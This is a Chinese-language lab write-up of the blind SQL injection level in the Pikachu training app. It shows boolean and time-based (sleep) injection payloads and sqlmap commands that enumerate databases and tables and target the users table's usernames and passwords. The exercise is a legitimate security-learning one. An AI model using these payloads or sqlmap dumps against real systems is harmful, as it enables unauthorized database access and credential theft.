目录
盲注
盲注的意思就是说页面没有明显的回显,我们只能通过其他方式判断注入点。
常见的方式有两种,一种是布尔盲注,通过页面返回的不同状态判断语句是否被执行。另一种是时间盲注,通过页面加载时间来判断语句是否被执行。
布尔盲注
先输入一个之前关卡中的名字,返回正常
加上单引号,并没有报错,而是返回了我输入的信息不存在
加上注释符号后,返回又正常了,说明注入点存在,且就是单引号闭合
判断数据库名的长度
lucy’and length(database())>=1 #
lucy’and length(database())>=7 #
lucy’and length(database())>=8 #
说明数据库长度为7,根据之前的关卡,数据库为pikachu,确实长度为7。接下来要爆破数据库的名字,要一个字母一个字母爆破,手动爆破是十分复杂和耗费时间的。所以我们可以使用sqlmap工具或是自己写脚本进行爆破。
我这里使用sqlmap
查询数据库名:
python sqlmap.py -u “5749b9ee554a4ddb941b425ad59d8ced.app.mituan.zone/vul/sqli/sq… --current-db
爆表
python sqlmap.py -u “5749b9ee554a4ddb941b425ad59d8ced.app.mituan.zone/vul/sqli/sq… -D pikachu --tables
爆users表的列
python sqlmap.py -u “5749b9ee554a4ddb941b425ad59d8ced.app.mituan.zone/vul/sqli/sq… -D pikachu -T users --columns
爆username 和password的值
时间盲注
输入lucy
加上单引号
返回结果都一样,这样怎么判断是否有注入点呢?我们可以采用时间注入的方式。
使用下面的pyload,点击查询后,过5s页面才返回下面的一句话,说明sleep(5)被执行了,说明页面可以执行我们构造的语句,只是没有回显,那么我们就可以用类似布尔盲注的方法进行时间盲注,报错出所要查询的信息。
lucy’ and sleep(5) #
还是使用salmap
爆出所有的数据库
python sqlmap.py -u “5749b9ee554a4ddb941b425ad59d8ced.app.mituan.zone/vul/sqli/sq… --dbs
pyload和布尔盲注一样,不得不说,sqlmap真好用。剩下的就不举例了,参考之前的即可。
